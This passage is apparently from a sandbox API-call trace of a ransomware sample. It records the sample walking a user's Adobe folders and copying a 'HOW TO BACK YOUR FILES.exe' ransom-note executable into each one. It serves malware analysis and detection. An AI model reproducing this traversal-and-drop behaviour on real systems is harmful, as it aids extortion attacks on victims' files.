returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0106.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0106.632] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 126 [0106.632] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.632] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.632] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.633] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.633] GetLastError () returned 0x0 [0106.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.633] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.633] CloseHandle (hObject=0x120) returned 1 [0106.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.634] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.634] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.634] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.634] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0106.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0106.634] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 131 [0106.634] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.634] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.634] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.635] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.635] GetLastError () returned 0x0 [0106.635] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.635] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.635] CloseHandle (hObject=0x120) returned 1 [0106.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.635] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.635] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7103a280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x7103a280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.636] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.636] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.636] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0106.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0106.636] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned 137 [0106.636] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.636] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.636] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.637] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.637] GetLastError () returned 0x0 [0106.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.637] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.637] CloseHandle (hObject=0x120) returned 1 [0106.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.637] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.637] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x710603e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x710603e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.638] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.638] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.638] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe" [0106.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0106.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0106.638] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe") returned 101 [0106.638] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe" [0106.638] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.638] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.639] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.639] GetLastError () returned 0x0 [0106.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.639] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.639] CloseHandle (hObject=0x120) returned 1 [0106.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.639] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.639] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.639] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.639] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0106.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0106.640] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned 107 [0106.640] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.640] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.640] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\adobe\\color\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.640] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.641] GetLastError () returned 0x0 [0106.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.641] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.641] CloseHandle (hObject=0x120) returned 1 [0106.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.641] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.641] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.641] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.641] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0106.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0106.641] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned 116 [0106.641] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.641] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.641] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\adobe\\color\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.642] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.642] GetLastError () returned 0x0 [0106.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.642] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.642] CloseHandle (hObject=0x120) returned 1 [0106.642] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.643] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.643] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.643] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.643] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.643] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0106.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0106.643] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 109 [0106.643] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.643] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.643] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.644] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.644] GetLastError () returned 0x0 [0106.644] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.644] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.644] CloseHandle (hObject=0x120) returned 1 [0106.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.644] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.644] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.644] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.645] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0106.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: 